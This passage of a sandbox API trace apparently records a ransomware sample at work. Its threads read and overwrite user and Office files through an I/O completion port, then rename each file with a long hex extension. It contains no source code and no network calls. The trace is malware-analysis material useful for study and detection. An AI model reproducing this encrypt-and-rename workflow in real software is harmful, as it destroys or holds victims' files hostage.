lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.391] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x25fff70) returned 0x0 [0123.392] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm", lpString2=".0DD93C837654B0839DDEF56637D4F8C27BAD1498CB2D98E249244137BE9A1D53" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.0DD93C837654B0839DDEF56637D4F8C27BAD1498CB2D98E249244137BE9A1D53") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.0DD93C837654B0839DDEF56637D4F8C27BAD1498CB2D98E249244137BE9A1D53" [0123.392] GetProcessHeap () returned 0x600000 [0123.392] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x148) returned 0x3369598 [0123.392] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x25fff60, FileInformation=0x3369598, Length=0x148, FileInformationClass=0xa) returned 0x0 [0123.394] CloseHandle (hObject=0x324) returned 1 [0123.394] GetProcessHeap () returned 0x600000 [0123.394] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.394] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.395] WriteFile (in: hFile=0x32c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0123.396] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.603] ReadFile (in: hFile=0x320, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0123.609] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.677] ReadFile (in: hFile=0x304, lpBuffer=0x3360140, nNumberOfBytesToRead=0x3c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0123.677] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.714] ReadFile (in: hFile=0x320, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0123.714] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.714] WriteFile (in: hFile=0x320, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0123.830] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.830] WriteFile (in: hFile=0x338, lpBuffer=0x33b61f0, nNumberOfBytesToWrite=0x6e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x33960b8 | out: lpBuffer=0x33b61f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x33960b8) returned 0x0 [0123.832] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.833] WriteFile (in: hFile=0x33c, lpBuffer=0x342e5f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x340e4c0 | out: lpBuffer=0x342e5f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x340e4c0) returned 0x0 [0123.836] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.836] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x32a0fb8, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x32a0fb8, ReturnLength=0x25fff70) returned 0x0 [0123.837] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\TeXpMKM3_N_X36rbQ.ods", lpString2=".692E07D613719AD9F783C1EC1F65C05D53194C9EF55545213C739928BCC80B2C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\TeXpMKM3_N_X36rbQ.ods.692E07D613719AD9F783C1EC1F65C05D53194C9EF55545213C739928BCC80B2C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\TeXpMKM3_N_X36rbQ.ods.692E07D613719AD9F783C1EC1F65C05D53194C9EF55545213C739928BCC80B2C" [0123.837] GetProcessHeap () returned 0x600000 [0123.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x6f6188 [0123.837] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x25fff60, FileInformation=0x6f6188, Length=0x124, FileInformationClass=0xa) returned 0x0 [0123.841] CloseHandle (hObject=0x308) returned 1 [0123.842] GetProcessHeap () returned 0x600000 [0123.842] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0f08 | out: hHeap=0x600000) returned 1 [0123.842] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.842] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33be2c0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x33be2c0, ReturnLength=0x25fff70) returned 0x0 [0123.843] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\o0G-d1omd0xB.flv", lpString2=".8EDB00B946CFAF701A807E72F2449C8E5416FF72560C61153231B06BCAAF9923" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\o0G-d1omd0xB.flv.8EDB00B946CFAF701A807E72F2449C8E5416FF72560C61153231B06BCAAF9923") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\o0G-d1omd0xB.flv.8EDB00B946CFAF701A807E72F2449C8E5416FF72560C61153231B06BCAAF9923" [0123.843] GetProcessHeap () returned 0x600000 [0123.843] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x130) returned 0x6f68d8 [0123.843] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x25fff60, FileInformation=0x6f68d8, Length=0x130, FileInformationClass=0xa) returned 0x0 [0123.867] CloseHandle (hObject=0x328) returned 1 [0123.871] GetProcessHeap () returned 0x600000 [0123.871] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x33be210 | out: hHeap=0x600000) returned 1 [0123.873] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.903] WriteFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 0x0 [0123.923] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0123.924] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x25fff70) returned 0x0 [0123.925] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\WVeH9q0ejR.bmp", lpString2=".75454500CA9E2F312778603CEFD3A2D07D98040ADD6BA07605E7EAD74734D016" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\WVeH9q0ejR.bmp.75454500CA9E2F312778603CEFD3A2D07D98040ADD6BA07605E7EAD74734D016") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\WVeH9q0ejR.bmp.75454500CA9E2F312778603CEFD3A2D07D98040ADD6BA07605E7EAD74734D016" [0123.925] GetProcessHeap () returned 0x600000 [0123.925] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x116) returned 0x3368750 [0123.925] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x25fff60, FileInformation=0x3368750, Length=0x116, FileInformationClass=0xa) returned 0x0 [0123.930] CloseHandle (hObject=0x33c) returned 1 [0123.930] GetProcessHeap () returned 0x600000 [0123.930] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.930] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0124.951] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x25fff70) returned 0x0 [0124.951] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\vaHBhl.mp3", lpString2=".78F023E6B3B2B436B08F12C8439C95813153BA5627A117C44E9ECD85331B8841" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\vaHBhl.mp3.78F023E6B3B2B436B08F12C8439C95813153BA5627A117C44E9ECD85331B8841") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Music\\vaHBhl.mp3.78F023E6B3B2B436B08F12C8439C95813153BA5627A117C44E9ECD85331B8841" [0124.951] GetProcessHeap () returned 0x600000 [0124.951] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x311a488 [0124.951] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x25fff60, FileInformation=0x311a488, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0124.952] CloseHandle (hObject=0x328) returned 1 [0124.953] GetProcessHeap () returned 0x600000 [0124.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0124.953] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0124.956] WriteFile (in: hFile=0x328, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0124.971] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0125.518] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x25fff70) returned 0x0 [0125.519] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\Wbcoh.mp4", lpString2=".915A14123DBFEEFE8BE26C6A4E2E6FCD0957927AEBB02AE9C3B8A708A019F37C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\Wbcoh.mp4.915A14123DBFEEFE8BE26C6A4E2E6FCD0957927AEBB02AE9C3B8A708A019F37C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\Wbcoh.mp4.915A14123DBFEEFE8BE26C6A4E2E6FCD0957927AEBB02AE9C3B8A708A019F37C" [0125.519] GetProcessHeap () returned 0x600000 [0125.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10a) returned 0x3155b50 [0125.519] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x25fff60, FileInformation=0x3155b50, Length=0x10a, FileInformationClass=0xa) returned 0x0 [0125.520] CloseHandle (hObject=0x334) returned 1 [0125.520] GetProcessHeap () returned 0x600000 [0125.520] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0125.520] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0125.523] ReadFile (in: hFile=0x334, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0125.524] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0125.525] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x25fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x25fff70) returned 0x0 [0125.526] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\xe8lKRUdBak-DlNI7s4.avi", lpString2=".D69D2154E4CF46EA1526BCF316289FD410F43F59AD710D0DC5250455CA4DB02C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\xe8lKRUdBak-DlNI7s4.avi.D69D2154E4CF46EA1526BCF316289FD410F43F59AD710D0DC5250455CA4DB02C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\xe8lKRUdBak-DlNI7s4.avi.D69D2154E4CF46EA1526BCF316289FD410F43F59AD710D0DC5250455CA4DB02C" [0125.526] GetProcessHeap () returned 0x600000 [0125.526] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x3156c98 [0125.526] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x25fff60, FileInformation=0x3156c98, Length=0x126, FileInformationClass=0xa) returned 0x0 [0125.527] CloseHandle (hObject=0x334) returned 1 [0125.527] GetProcessHeap () returned 0x600000 [0125.528] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0125.528] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74) returned 1 [0125.532] WriteFile (in: hFile=0x334, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0125.532] GetQueuedCompletionStatus (CompletionPort=0x274, lpNumberOfBytesTransferred=0x25fff7c, lpCompletionKey=0x25fff78, lpOverlapped=0x25fff74, dwMilliseconds=0xffffffff) Thread: id = 119 os_tid = 0x4b4 [0091.020] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0104.941] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x26fff70) returned 0x0 [0104.942] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", lpString2=".C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.C2A50E74CBBCE2D28D8FE1595662EB9DA2E91D1B214115E0AA3F728475C0B167" [0104.942] GetProcessHeap () returned 0x600000 [0104.942] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x132) returned 0x3163710 [0104.966] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x26fff60, FileInformation=0x3163710, Length=0x132, FileInformationClass=0xa) returned 0x0 [0104.967] CloseHandle (hObject=0x308) returned 1 [0104.968] GetProcessHeap () returned 0x600000 [0104.968] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0104.970] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0104.974] ReadFile (in: hFile=0x32c, lpBuffer=0x315b5b0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b478 | out: lpBuffer=0x315b5b0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b478) returned 1 [0104.974] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0104.975] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x313b528, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x313b528, ReturnLength=0x26fff70) returned 0x0 [0104.976] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml", lpString2=".F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.F193705816E2AE5CABAEF6C93E9ED0BAC5D2803827239C4815DAE903EC0CE265" [0104.976] GetProcessHeap () returned 0x600000 [0104.976] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1f4) returned 0x3163850 [0104.976] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x26fff60, FileInformation=0x3163850, Length=0x1f4, FileInformationClass=0xa) returned 0x0 [0104.977] CloseHandle (hObject=0x32c) returned 1 [0105.212] GetProcessHeap () returned 0x600000 [0105.212] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b478 | out: hHeap=0x600000) returned 1 [0105.212] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.216] WriteFile (in: hFile=0x314, lpBuffer=0x3184b90, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58) returned 0x0 [0105.218] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.220] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x3164b08, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x3164b08, ReturnLength=0x26fff70) returned 0x0 [0105.221] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml", lpString2=".2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822" [0105.221] GetProcessHeap () returned 0x600000 [0105.221] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b8) returned 0x30f02f8 [0105.222] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x26fff60, FileInformation=0x30f02f8, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0105.224] CloseHandle (hObject=0x314) returned 1 [0105.230] GetProcessHeap () returned 0x600000 [0105.230] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3164a58 | out: hHeap=0x600000) returned 1 [0105.232] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.397] ReadFile (in: hFile=0x30c, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0105.420] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.518] ReadFile (in: hFile=0x31c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0105.520] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.520] WriteFile (in: hFile=0x31c, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0105.522] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x26fff7c, lpCompletionKey=0x26fff78, lpOverlapped=0x26fff74) returned 1 [0105.523] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x26fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x26fff70) returned 0x0 [0105.524] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2=".16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.16F4E381E48D0162EE67461A5365EBAC257148C9DDB30EE640C0B7F823854914") 